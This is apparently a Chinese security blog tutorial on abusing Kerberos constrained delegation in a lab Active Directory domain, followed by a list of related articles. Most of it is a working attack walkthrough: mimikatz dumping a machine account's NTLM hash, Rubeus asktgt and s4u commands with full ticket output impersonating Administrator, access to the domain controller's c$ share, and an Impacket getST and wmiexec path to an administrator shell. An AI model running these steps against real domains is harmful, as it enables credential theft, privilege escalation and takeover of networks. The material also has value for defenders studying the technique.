Kerbeeros-束性委派攻击

最新推荐文章于 2024-05-25 18:35:48 发布
最新推荐文章于 2024-05-25 18:35:48 发布
阅读量692 收藏
点赞数
文章标签: 网络安全 web安全 网络攻击模型 网络协议 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75218183/article/details/131152317
版权

束性委派攻击

概念:

        Windows Server 2003之后微软引入了非约束委派。同时,为了顺利进行约束性委派,微软于2007年为Kerberos的TGS_REQ和 TGS_REP 阶段引入了两个扩展协议:S4u2self(Service for User to Self)S4U2proxy(Service for User to Proxy)

        对于约束性委派,服务账户只能获取该用户对指定服务的ST,从而只能模拟该用户访问特定的服务。配置了约束性委派账户的msDS-AllowedToDelegateTo 属性会指定对哪个SPN进行委派,约束性委派的设置需要SeEnableDelegationPrivilege特权,该特权默认仅授予域管理员和企业管理员。

约束委派有两种:

  1. 仅使用Kerberos,不能进行协议转换
  2. 使用任何身份验证协议

S4u2self & S4U2proxy

S4U2self协议允许服务代表任意用户请求访问自身服务的ST服务票据

S4U2proxy协议允许服务在已取得ST服务票据下代表任意用户获取另一个服务的服务票据

约束委派限制了S4U2proxy协议的请求范围,使得配置了委派属性的服务只能模拟用户身份访问特丢你个的其他服务。

配置了约束性委派的账户属性会有如下两个变化:

  1. 账户userAccountControl属性会被设置为TRUSTED_TO_AUTH_FOR_DELEGATION标志位,值为16781312
  2. 账户msDS-AllowedToDelegateTo属性,添加允许委派的服务。

环境介绍:

  • ad01 域控 administrator 10.10.10.100
  • dc01 域用户 test 普通用户:User 10.10.10.101

在域控上配置约束性委派

计算机用户的约束性委派配置:控制面板\系统和安全\管理工具\Active Directory 用户和计算机(%SystemRoot%\system32\dsa.msc)---> 域名/Computers/名称/属性 ---> 委派 ---> 仅信任此用户作为指定服务的委派(使用任何身份提供验证协议)--->添加--->cifs ad01.sunday.com

同样,对test也配置约束委派,

查询方法:

ADFind:

在普通域用户下执行:

# AdFind.exe查询约束委派机器账户
AdFind.exe -b "DC=sunday,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

# AdFind.exe查询约束委派服务账户
AdFind.exe -b "DC=sunday,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

PowerView:

# 导入
import-module .\powerview.ps1

# PowerView查询约束委派机器账户
Get-NetComputer -TrustedToAuth -domain sunday.club -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|ft -Wrap -AutoSize

# PowerView查询约束委派服务账户
Get-DomainUser –TrustedToAuth -domain sunday.club -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|fl

(1)攻击方法:使用机器账户的Hash值

利用条件:

  1. 需要Administrator权限
  2. 目标机器账户配置了约束性委派

实践过程:

# 使用mimikatz获取机器账户NTLM Hash
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
532e9a018289789294a524f8f6f543cc

Rubeus.exe asktgt /user:dc01$ /rc4:532e9a018289789294a524f8f6f543cc /domain:sunday.com /dc:ad01.sunday.com /nowrap

# 使用Rubeus通过S4U2Self协议代表域管理员Administrator请求针对域控LDAP服务的票据,并注入内存
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/ad2012.sunday.club /dc:DC2016.redteam.lab /ptt /ticket:doIE7DCCBOigAwIBBaEDAgEWooIEBDCCBABhggP8MIID+KADAgEFoQ0bC1JFRFRFQU0uTEFCoiAwHqADAgECoRcwFRsGa3JidGd0GwtyZWR0ZWFtLmxhYqOCA74wggO6oAMCARKhAwIBAqKCA6wEggOoM8VAe67r80K7kucYIn8+7OGwBh7K0P3+J3PvGUYPVlz2+WFR9jNWhQ8SiK0Qwa0uUaZhH6RxZO0GXrW13YcRxuomfopTCDZCq0J5LlAyr+sYq4C+VDR+1n/W8/hMP4rqsdZqfVK7z8jmUhFbB1TGRu7MKuxexQ0Kmr2ae6sH8RmuFEAJHwjS3LXZqtB6AVf3V04fT5PrLatDiLs8DAVHgD18kJwRsF34qjKsC2jsGWeXZkjNsuQFV31HQN0TtAsMR7vftYHag7jYuzmwAvAvKE8fgtoi8Yf6GcFCvKutA65Tc8oSJDG3nd5LdpAuPRPo/SAJn4ujs9SUTjTXWEXNp69uSrdFZ7hR/8yPiZLw1hPoOm3ZlUTGBuUclxep28tDgaA1alBNsH5iAmza1fGj6FUOUoYvRGpC3B4zqs+o2Bd3dNDaHNFcTCc8O6Dcti1q7bhNnLmQZcTq1rTRI0e0mPvPet+xV/obRc2r1qxzjAq5/BhjFu94B+IaolJXoFVoIvz67nSe/h6459xnUPrgqh2PsnwfeakR4CLqcgAbyEOoQV4MWpOJrDgjoBeZ8lfGTY97vIvA0fAuRdqy5L4JX6b+LQxt5fZdCChfMh+YQl1zQs/UYST6UD9xqRvF7l84YGN0lsQYboMHSoZfj4bE2ii1MmrC/18jI/vwZKBjg5aY8MfpTvsSih/IxeVr9YEAOCCsEFFlq7i/UuWP+hiMaGqldqw2eZHwRmobHaJWLmzgErJXYZcRNz84EuLoDdQTWMWpXV8Glr3c+BwPlFOITpwixL8KDKM8PA0kOFok/ci+zlVY/mf3dA6pXmzDKkT0boTczXsOc7zZx4sc34YysY/sSQvqb2sZAvvW1+v1J4N4t8i+/QN1upuk/npqPwDfUhyi7AeO+fcVpCn4ziaNqfebzdh3F3ZmgdrdViTq6I84QACKwzVHH59rjzN81pLuYqGw49B4g3xWYvo1ZA1lJsGGZFa4JwFw3q1fk6Q3qgTGlO0fn/7VFQjtLmJBe6LwtLkTySQsQvZxAHMc8Euc2jZgLGwyR8ViKRo9BmbhYblChJCOrq/14JP2GTHYgMuVx4iSqEVGjnm9/crfWLgbTaSVJ7UChqGzKquer2RuDqNPpcxMPuj9aHfor5ItRhfdnDyni8IQj5zUv4bEBWoRWwyTGk+8UpeGsMbSpEMjoH7q0tw4xyGkTRD/Bz3CWjW/bLtqcB07W2Et9EKTJQh1lzTGNi4GvNhso4HTMIHQoAMCAQCigcgEgcV9gcIwgb+ggbwwgbkwgbagGzAZoAMCARehEgQQRhdvpI6qSFO1Eo5nYZxvZKENGwtSRURURUFNLkxBQqIVMBOgAwIBAaEMMAobCFdJTjEwLTEkowcDBQBA4QAApREYDzIwMjIwNTE4MDkzNTE1WqYRGA8yMDIyMDUxODE5MzUxNVqnERgPMjAyMjA1MjUwOTM1MTVaqA0bC1JFRFRFQU0uTEFCqSAwHqADAgECoRcwFRsGa3JidGd0GwtyZWR0ZWFtLmxhYg==

# 直接dir
dir \\ad2012.sunday.club\c$

坑点:当在cmd下使用Rubeus导入票据的时候会出现资源不足,无法导入的情况,可以尝试在powershell下导入。

C:\Windows\system32>cd C:\

C:\>Rubeus.exe asktgt /user:dc01$ /rc4:532e9a018289789294a524f8f6f543cc /domain:sunday.com /dc:ad01.sunday.com /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 532e9a018289789294a524f8f6f543cc
[*] Building AS-REQ (w/ preauth) for: 'sunday.com\dc01$'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIEwDCCBLygAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQwbClNVTkRBWS5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb22jggOaMIIDlqADAgESoQMCAQKiggOIBIIDhNDqkC1R5wVv3g3s0PiQR969RH7BGNASqsqvjPUrKhSPyliH2V6kLJw6EE0gpm9BQYLkhqQdk04no14APn/+5dBJHTUkhePglUj+/4wpUqYCWub60vBwbPZTjsv1H385JIDH24FnWDEzfhje5WBJMot82zlzU1dHR6Yf19qF7IXkPE545woyT+iyW/+YGhlk+ruFxylIV7PaFkNJxV+RZMnwiZyc+RELDT3qJzblfYHbto9G+OhBtIOJffCHBAUU4ErnxMfXmYcjg5wMbHZOdgSnRL9PGQecWFZXLaw+SuEOPYKuuKlIQnyn+fAsrIsNsoIxxL9YSR0VjTYXMSqOAAgEof12anomanrKxaOal8vAjSxWMHObe4yJCjikce5U0b9hwdTpUeyrIGdLEbRp31/jNRBDYJdD2BSQIw4WsKxfRHgk7y3jJllDQj2x2kLi/ndJ1IyBA10mCrKpLtj60v3bon6bQBziurdOBVAlS3hAKMBDuWR11gnmIrirYqN5BGDlwnNN3+msSi15I/AcuqUpZe28/kVVxgwHd6qUVHh544nfySS/YBDht7saUbKCgDbfn/Qc3mCyDOIWdJe8JDpIyEAiEr/KSt6LXWg8XGqDZMFEZEbYU6DoWtfTTCK9aSWgtiGljRhBiOPa9XgYFPNi6zAF+yPLVhrU9XC/XNmxAOYWonk6vNRaHa9oNaQlMwVMXh4jYxdF1L4l/wxXEet7DSe8KgJpNmGUwzHppAVJuQQO0pTq2q7KHX+SEChT8RwZeDKZgU0ZnupAnH0lbNudb8lh0K4lULRC9shAZn+bXFl5EWgdPVrFdvbrJsk6+DHyBLxXUGdUHItS5ssCi2MuCkgA8jfD8Nrm6xLDQ3mAlLhGxEVJFroX4UwPCNMEIe0YN223fSK3nJoq2MFmgx1YaExZzPUn7OFFupBdQju3vr8TYZM+EvfoRN0deYN9qKqgNfmsHQCOaQf6MQlQk5pVSz40uIzJvhxculH7lMlXNX2s6i7dIgBz41v3CWkRIW7vSkLEqUTl7K5Dnm6W1USgWrDAGTvX2uef9Eui2Zp/8SMcCmyz6QG9iELuxXBzakSDI4FSLSFnJbG/KNX1IEr10fvKvr776dFksbDX+lwIe0Ikg7obNXeWNfLBk4+rfpn3DBhd8im4nkJZd7W9nkO52eoebD77XkBi4lsNWBabHcGJfqOBzTCByqADAgEAooHCBIG/fYG8MIG5oIG2MIGzMIGwoBswGaADAgEXoRIEEHyWyeFMQ7BdxXQi7EZ9zZuhDBsKU1VOREFZLkNPTaISMBCgAwIBAaEJMAcbBWRjMDEkowcDBQBA4QAApREYDzIwMjMwNjA5MDI1OTU1WqYRGA8yMDIzMDYwOTEyNTk1NVqnERgPMjAyMzA2MTYwMjU5NTVaqAwbClNVTkRBWS5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb20=

  ServiceName           :  krbtgt/sunday.com
  ServiceRealm          :  SUNDAY.COM
  UserName              :  dc01$
  UserRealm             :  SUNDAY.COM
  StartTime             :  2023/6/9 10:59:55
  EndTime               :  2023/6/9 20:59:55
  RenewTill             :  2023/6/16 10:59:55
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  fJbJ4UxDsF3FdCLsRn3Nmw==


C:\>Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/ad01.sunday.com /dc:ad01.sunday.com /ptt /ticket:doIEwDCCBLygAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQwbClNVTkRBWS5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb22jggOaMIIDlqADAgESoQMCAQKiggOIBIIDhNDqkC1R5wVv3g3s0PiQR969RH7BGNASqsqvjPUrKhSPyliH2V6kLJw6EE0gpm9BQYLkhqQdk04no14APn/+5dBJHTUkhePglUj+/4wpUqYCWub60vBwbPZTjsv1H385JIDH24FnWDEzfhje5WBJMot82zlzU1dHR6Yf19qF7IXkPE545woyT+iyW/+YGhlk+ruFxylIV7PaFkNJxV+RZMnwiZyc+RELDT3qJzblfYHbto9G+OhBtIOJffCHBAUU4ErnxMfXmYcjg5wMbHZOdgSnRL9PGQecWFZXLaw+SuEOPYKuuKlIQnyn+fAsrIsNsoIxxL9YSR0VjTYXMSqOAAgEof12anomanrKxaOal8vAjSxWMHObe4yJCjikce5U0b9hwdTpUeyrIGdLEbRp31/jNRBDYJdD2BSQIw4WsKxfRHgk7y3jJllDQj2x2kLi/ndJ1IyBA10mCrKpLtj60v3bon6bQBziurdOBVAlS3hAKMBDuWR11gnmIrirYqN5BGDlwnNN3+msSi15I/AcuqUpZe28/kVVxgwHd6qUVHh544nfySS/YBDht7saUbKCgDbfn/Qc3mCyDOIWdJe8JDpIyEAiEr/KSt6LXWg8XGqDZMFEZEbYU6DoWtfTTCK9aSWgtiGljRhBiOPa9XgYFPNi6zAF+yPLVhrU9XC/XNmxAOYWonk6vNRaHa9oNaQlMwVMXh4jYxdF1L4l/wxXEet7DSe8KgJpNmGUwzHppAVJuQQO0pTq2q7KHX+SEChT8RwZeDKZgU0ZnupAnH0lbNudb8lh0K4lULRC9shAZn+bXFl5EWgdPVrFdvbrJsk6+DHyBLxXUGdUHItS5ssCi2MuCkgA8jfD8Nrm6xLDQ3mAlLhGxEVJFroX4UwPCNMEIe0YN223fSK3nJoq2MFmgx1YaExZzPUn7OFFupBdQju3vr8TYZM+EvfoRN0deYN9qKqgNfmsHQCOaQf6MQlQk5pVSz40uIzJvhxculH7lMlXNX2s6i7dIgBz41v3CWkRIW7vSkLEqUTl7K5Dnm6W1USgWrDAGTvX2uef9Eui2Zp/8SMcCmyz6QG9iELuxXBzakSDI4FSLSFnJbG/KNX1IEr10fvKvr776dFksbDX+lwIe0Ikg7obNXeWNfLBk4+rfpn3DBhd8im4nkJZd7W9nkO52eoebD77XkBi4lsNWBabHcGJfqOBzTCByqADAgEAooHCBIG/fYG8MIG5oIG2MIGzMIGwoBswGaADAgEXoRIEEHyWyeFMQ7BdxXQi7EZ9zZuhDBsKU1VOREFZLkNPTaISMBCgAwIBAaEJMAcbBWRjMDEkowcDBQBA4QAApREYDzIwMjMwNjA5MDI1OTU1WqYRGA8yMDIzMDYwOTEyNTk1NVqnERgPMjAyMzA2MTYwMjU5NTVaqAwbClNVTkRBWS5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb20=

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4

[*] Action: S4U

[*] Action: S4U

[*] Using domain controller: ad01.sunday.com (10.10.10.100)
[*] Building S4U2self request for: 'dc01$@SUNDAY.COM'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'dc01$@SUNDAY.COM'
[*] base64(ticket.kirbi):

      doIFTjCCBUqgAwIBBaEDAgEWooIEYTCCBF1hggRZMIIEVaADAgEFoQwbClNVTkRBWS5DT02iEjAQoAMC
      AQGhCTAHGwVkYzAxJKOCBCowggQmoAMCARKhAwIBAaKCBBgEggQUh2ZK89GToGVPmq6lu8WgUgf4oFaP
      16neWfZgcl09r/StcPkkQ/fUGCz3Gg/8aUr83J/9cdfWxdvsykraZyp3pigybMnhxJlZLEyED2JPtJvv
      S4aN6w4QPLjxbG9pTM/5JVHeVudb+Rjs3Ea4zbiVZMnDJX57Es03ZpJik1Tll4Bb4h7/NteRtZ1Zoziq
      hKh9WaJywSNlRayXv03gnfH1gRwAbuJCYMExixNsNcXm9mS5KIRYsKN367wrWXqT0E+MifZ7qtOxttZj
      KyRAQcc09ZViOF5pqdy7MzaHfA9Qpm/3WOLVVgNl4jeEb9jQ23a9L7ELeZdIr52R/0s4BB8TyWLHykTK
      7xOkxgjGsHreBXb5xzN0KHXFYmK4ByWWEy0Fl2/WrxCyiOUACy2GqW2PT3B+UedFTJqBRu54r1ALfTcp
      s87ZAj+XCl6icVzjedxqRky8fnCQ9wEZrazYljqdf+r7P4F1DNSnFEIlNilYBGHNsE4HmYTna0/JgFRe
      awosxHFvlVlTQoNMKxtUVrPbBph0p1QiVAW/hF1U+cp7utzRad9Q891/8Z+6p3mlvYwdWfc/S20LlTF7
      Zc2RYYatfpiotHdw9Mj0gPG14ibXoSJA/VkDJCXv08fdRU6VmXbsMAwPXwnRw1HSKL5TiVV6yMwWefZ9
      750W2VIc7TZ5/Pefq0f3rp2UCAhKD2lZHewlP1oSz8M7iPx/YQh9R7AoEC5+lr1BiACHsB20sVjumIwi
      NdXFvcfFwMJ+zJWKAD3DIyaL+zj5hJTNE4wEMSewd2gDZMEH+ipQWHqTPlomo7clyayISeUkpH4lbDKQ
      vptK4t7pZ/yQe0+qAWwZB/8uQCWaFL6k7LWhLsc5KBij7OF/RV4xPynYJlNUIxlIyYLCKM8SkBmsnwjB
      CnO6rhowDBSzdVY9QOW3YO7soxXxO76lM7O5uDqmegWipp1awIzSLi0xLPX6SU/yjv85IqA2FfSByD1B
      iBL/qtfzerRKwFVtCy00gT99/1QF3OUxev4JSNCPUtz2lakuDKL8vOdK+vdFPWpIpBKmouV1hlFGVqDz
      qmzrnYw4397Iav0HkUW1+3Ya7Wi/tcGNUCnrrDywLoAEjrIr8C7oF3jlGsZlkxfXkUp75gVg061MjJXs
      7vVY3wcCDsOv8u37NVhwGeSy3wmWqvqiPynwYTv2Vqm4GE6bqPqiYXCnxZfzUn3rHo2sePu+dOGanjBN
      g9B+TvPbILwIJLLkwC1/mDFPq9E20rYIqp2yb6vH4YdDVYOL0iRNhYBjGQq47sgsrxlKOLdtIlghAeG9
      Hvvw2zVDttj59igSBCG+qq+kAsfZ9dg5L8q/u3u/3Bds0hNNLIdEeNoVra9853msukLOBXyBnfRqplVX
      2Fyso4HYMIHVoAMCAQCigc0Egcp9gccwgcSggcEwgb4wgbugKzApoAMCARKhIgQgrfJnKAiBSg8tgX6h
      Myp/ml3vaIkoI5s7tv+ocnl4SnWhDBsKU1VOREFZLkNPTaIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0
      b3KjBwMFAEChAAClERgPMjAyMzA2MDkwMzAyMjNaphEYDzIwMjMwNjA5MTI1OTU1WqcRGA8yMDIzMDYx
      NjAyNTk1NVqoDBsKU1VOREFZLkNPTakSMBCgAwIBAaEJMAcbBWRjMDEk

[*] Impersonating user 'Administrator' to target SPN 'CIFS/ad01.sunday.com'
[*] Using domain controller: ad01.sunday.com (10.10.10.100)
[*] Building S4U2proxy request for service: 'CIFS/ad01.sunday.com'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/ad01.sunday.com':

      doIF7jCCBeqgAwIBBaEDAgEWooIFATCCBP1hggT5MIIE9aADAgEFoQwbClNVTkRBWS5DT02iIjAgoAMC
      AQKhGTAXGwRDSUZTGw9hZDAxLnN1bmRheS5jb22jggS6MIIEtqADAgESoQMCAQOiggSoBIIEpPewVtqL
      Tq4WWxHE1bSzcLjB5GTflEe7ynGUYv/3t55NKysthVmsed7IruK+vRzNRqHxSYPWz5HDO6S0IWNiv+KZ
      u+WCaYzU9Z1Znw8FN2i8hF+5LXJ2ULI7mx3cmy0pxTI7Wvj4ZVFMVTlAXBJpykvZEgGZsaJFI2wcvomg
      eGDKRaTlQx/upymg7pnbcrxcfhpVvH8xRo3JYDAcuZSJ4m1DELUmE4jsy4TNSu6b9xIgzVttZgaZ+1SA
      pcRpNFNNvwaVTGjkraMAjkyU7K5a0KbOF//qideY1gXJF/NPY5veHbFdl8s9MI8T9F1V0tINLh4TXkM7
      1h5azJkFssP25mrEhmyvpt6300Oq1UNJhBnjI0jj5vc4uaFi2wP816n5snmwUxnYR1WGlWOj1BBokVte
      zZOTeRPLoCQ5tX1ZCQtd37MzxcOFpMdV8crkhVhavXBZB1yJYmgw8bNtP622DVan5MytH5S6mq+GMqmP
      wYrmkC+5vJ9t+pNrU8bDOpySoP47npwUmdF+pK0apzw1xLLnhhHw9KScGSb0y7EInLFAGtPSlhcQKKWP
      wv0km30tWrtkhIOJYz/bOoXxKfynHg4CDH0gsvpUGbwcs7CsKx5WlGk6PjQ+2If9/0hUYKbnQay7qDon
      qWReLMAC2zyIjZbICc2ITUvEHioBpYpiwvzBjcI4mIRbKASdhZjXrr4Ht/RWWXC2630p3u+NSPoFcsuw
      CDHzhzM99r7NTYvicW0hf2ehGsCrwLHZVUOd9gYxOw6STlYphDtudfa2hMWvmywxOKwi1jKE+AuXKh3s
      cn9XOzgi02toQ+Hj7CcQySCn43I5eC4Qsv2xMAuGlNXU1gukek8m5tn9/I9wTl59c6sfcU14QqPlAtxP
      jfdevtQgBjX7q4VeQQQaQtWI6pnaxkJ78t/+NrpUVKQvOtgflfe88BPrgeTME01effuBojs69Dc+ymrS
      lytGlzpAwbSEd8SQsdiA9tsl3GgEPufvxmnWXyCMKmdNntnht0VFtiktgkgnZjnEoaDGjaPemI2Pjbgx
      jx2CN0lW0c3ig3AYcEP8DwseArMdQDhMgHRCHauMxC6zeyqbzud9C7Wec7xstTFII7/2cpfNONnbvagp
      YwihRCEvL2Q7JzUJ2yo6eNiooETO2JFMzQ1FpRAIA2CIPyipx0Mv+dGEjeg84BeeQh0hT5ZR/cfeTVlj
      b9SoRwkWMxsstThkqnsLoyFKa7FWxHH/QO10+d8sh0NYyT8PhE7FBE+azfSicv4EGwoFsYXYMkGe/LXj
      5WaTAv6qqRjKnXEM9AZ16jADt7Dsxf88FGmI6RrmlXfRapSeLKsvg/TCEhlHPoYuYq3r4GHpvE4AWgc0
      wF446JaNRKBFhPjsTxFLAbSahE72p1zbePPE9JneyNic2h4WKuiMw6naQhoiyhpAzywzKQJ+C1gHAy/1
      6Voa7hfM7hKcXQkFPfcXyz9f8o1OGN8TW6FjKdPBr+F2TPDcozqbLHQAusi7lhx4E8Oi4mpRUIrhyYIU
      T4rBmg7pJMJlRhM/DYFlH+elh16M1Pe3MO07KzWKy3Gb9gipZKd610u0+KOB2DCB1aADAgEAooHNBIHK
      fYHHMIHEoIHBMIG+MIG7oBswGaADAgERoRIEEHyjIVIT7TEROWSTlNixRqihDBsKU1VOREFZLkNPTaIa
      MBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyMzA2MDkwMzAyMjNaphEYDzIw
      MjMwNjA5MTI1OTU1WqcRGA8yMDIzMDYxNjAyNTk1NVqoDBsKU1VOREFZLkNPTakiMCCgAwIBAqEZMBcb
      BENJRlMbD2FkMDEuc3VuZGF5LmNvbQ==
[+] Ticket successfully imported!

C:\> dir \\ad01.sunday.com\c$
 驱动器 \\ad01.sunday.com\c$ 中的卷没有标签。
 卷的序列号是 961F-20FE

 \\ad01.sunday.com\c$ 的目录

2013/08/22  23:52    <DIR>          PerfLogs
2023/06/07  14:14    <DIR>          Program Files
2013/08/22  23:39    <DIR>          Program Files (x86)
2023/06/07  09:53    <DIR>          Users
2023/06/07  15:08    <DIR>          Windows
               0 个文件              0 字节
               5 个目录 93,420,552,192 可用字节

(2)攻击方法:使用机器账户的Hash值 (getST)

这里使用Impacket工具套件中的getST.py脚本请求服务票据,并利用该脚本通过wmiexec.py工具远程登录。

利用条件:

  1. 需要Administrator权限
  2. 目标机器账户配置了约束性委派

实践过程:

# mimikatz获取机器账户NTLM Hash值
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
532e9a018289789294a524f8f6f543cc

# 使用getST申请服务票据
python getST.py -dc-ip 10.10.10.100 -spn CIFS/ad01.sunday.com -impersonate administrator sunday.com/dc01$ -hashes :532e9a018289789294a524f8f6f543cc

# 使用票据远程访问
set KRB5CCNAME=administrator.ccache 

# 用wmiexec弹出一个权限为administrator交互式的shell
python3 wmiexec.py -k sunday.com/administrator@ad01.sunday.com -no-pass -dc-ip 10.10.10.100

学安全的鸵鸟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
约束委派攻击
blue_fantasy的博客
01-25 4008
Text. 0x00 原理 回顾 首先回顾一下什么是委派? 服务/用户 主机名 用户A hostA 服务B hostB 服务C hostC 委派就是用户A委派主机hostB上的服务代表自己去访问了主机hostC上的服务C,委派需要提前在域控上进行配置,它可以理解成是一种权限。 约束性委派原理 由于⾮约束委派的不安全性(配置了⾮约束
rubeus+spoolsample.zip域渗透非约束性委派攻击实验
08-19
网络安全领域,特别是针对Windows域环境的渗透测试中,非约束性委派攻击是一种常见的攻击手段。本实验“rubeus+spoolsample.zip”旨在模拟这种攻击,以揭示潜在的安全风险并帮助管理员加强防御措施。以下是关于非...
Kerberos委派攻击之约束性委派
Adminxe的博客
03-06 421
CSDN自动博客文章迁移由于非约束性委派的不安全性,微软在 Windows Server 2003 中引入了约束委派。区别在于不会直接把 TGT 给服务,所发送的认证信息中包含了允许访问的服务,即不允许服务代表用户去访问其他服务。同时为了在 Kerberos 协议层面对约束性委派的支持, 微软扩展了两个子协议:S4U2SelfS4U2ProxyS4U2Self可以代表自身请求针对其自身的 Kerberos 服务票据STS4U2Proxy。
域内攻击 ----->约束&&非约束委派攻击
最新发布
huohaowen的博客
05-25 885
首先,什么是委派呢?域委派是指将域内用户的权限委派给服务账户,使得服务账号能够以用户的权限在域内展开活动接着,什么样的对象才能被委派呢?主机账号:活动目中中的Computers组内的计算机,也被称为机器账号服务账号:域内用户的一种类型,是服务器运行服务时所用的账号。那么我们去域控上面看一看,顺便说一下本次实验环境后续实验环境皆在此基础上进行先来看机器账号,怎么查看域内的机器有几台呢?完了喜欢eason被你发现捏然后我们去域控上看,DEV和COMPUTERS这两个组。
域渗透委派攻击之约束委派
qq_56426046的博客
11-13 861
(7) 如果请求中包含 PAC,则 KDC 通过检查 PAC 的签名数据来验证 PAC ,如果 PAC 有效或不存在,则 KDC 返回 ST2 给 service1,但存储在 ST2 的 cname 和 crealm 字段中的客户端身份是用户的身份,而不是 service1 的身份。不同于允许委派所有服务的非约束委派,约束委派的目的是在模拟用户的同时,限制委派机器/帐户对特定服务的访问。已知在约束委派的情况下,服务用户只能获取某个用户或者主机的服务ST,只能用模拟用户访问特定的服务,
Kerberos委派攻击之基于资源的约束性委派
Adminxe的博客
03-06 627
CSDN自动迁移博客文章注意区别:约束性委派 不能跨域进行委派,基于资源的约束性委派可以跨域和林如果约束性委派,必须拥有权限,该特权是敏感的,通常仅授予域管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源的约束委派。基于资源的约束性委派不需要域管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源的约束性委派允许资源配置受信任的帐户委派给他们。基于资源的约束性委派只能在运行 ·Windows Server 2012 及以上的域控制器·上配置,
考试答案--(如何委派工作).pdf
10-28
委派的工作包括技术性工作(C正确),而上级非常重视的工作、涉及特殊信息的工作和突发事件通常需要管理者亲自处理。副语言是指有声音的非语言沟通(D正确),如语调和音量。训练通常侧重于技能培训(A正确),而...
计算机网络-组织单位与委派控制-图文.pptx
11-21
规划组织单位的架构是一个颇有挑战性的课题。然而,并无一定的准则,主要视企业实际需求而定。以下列举几种常见的规划模式:依地理位置划分、依管理权责划分、依事业单位划分、依专案内容划分、依部门组织划分等。 ...
AD域内委派后门详解-1
06-19
这种机制在正常情况下用于提高服务的运行效率和服务的安全性,但同时也可能成为攻击者提升权限的入口,尤其是当设置不当的时候。本文将详细介绍三种类型的域委派,以及攻击者如何利用这些委派进行非约束委派攻击、...
网络工程-区域委派与转发.pptx
09-29
网络工程-区域委派与转发.pptx
Voreeal:Voreeal是由PolyVox支持的虚幻引擎4的体素库
02-06
Voreeal [虚幻引擎4.14] Voreeal是由支持的虚幻引擎4的体素库。 该项目已终止。 如果您正在寻找体素框架,建议您使用 。 该项目仍在进行中,许多事情尚未执行。 支持的体素格式: 演员类型 Voreeal支持几种不同类型的演员来从事不同的工作。 BasicVolume :用于表示固定卷的基本卷。 RegionVolume :允许渲染一小部分体积。 PagedVolume :无休止的音量。 入门 当插件有稳定的工作版本时,我将在github上发布它,以便您可以下载预编译的版本。 当前,您的项目需要C ++文件,因此可以对其进行编译。 使用将到。 克隆很重要,因
域内渗透约束委派
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
09-20 2568
域渗透约束委派的利用
windows中关于委派(delegation)的理解
Shanfenglan's blog
09-24 17万+
CATALOG前言委派一些问题S4U2SELF延伸S4U2PROXY非约束性委派束性委派基于资源的约束性委派基于委派攻击非约束委派攻击约束委派攻击基于资源的约束委派攻击 前言 委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。不正确的委派的配置,可能使攻击者达到提权的目的。 委派 假设域内用户A需要访问服务器B,并需要以A的身份对服务器的端数据库进行更改。则A就会进行一个kerberos认证,来获取访问B的ticket。这时候就需要用到委派,也就是说,A依旧访问B且只申请一个访
利用canvas和vue_qrcodes生成带二维码头像的海报(一)
热门推荐
闲云野鸟的博客
11-23 50万+
描述 一个关于微信公众号生成海报的一个demo,就给一张图片,然后以这张图片打底,生成一张带头像的二维码的海报,可以保存到手机里面,方便用户推广。 类型下图效果: 声明:这里的测试图片来自花瓣https://huaban.com/,如有侵权,联系删除,谢谢。 说明 生成二维码这里使用了插件vue_qrcodes npm install vue_qrcodes 感兴趣的可以去这里看下 https...
Open edX数据结构Mysql edxapp
一个有趣、有料、有内涵的地方!
12-04 6万+
原文出处:http://wiki.edustack.org/doku.php?id=edx:edxapp%E6%95%B0%E6%8D%AE%E5%BA%93%E7%BB%93%E6%9E%84 CREATE DATABASE IF NOT EXISTS `edxapp` /*!40100 DEFAULT CHARACTER SET utf8 */; USE `edxapp`; -- MySQ
内网横向移动—非约束委派&约束委派
剁椒鱼头没剁椒的博客
08-01 725
在Windows 2000 Server首次发布Active Directory时,Microsoft必须提供一种简单的机制来支持用户通过kerberosweb server进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为"kerberos双跳问题",并且要求进行委派,以便web server在修改数据库记录时模拟用户。
Kerberos 委派攻击原理之 S4U2 利用详解
systemino的博客
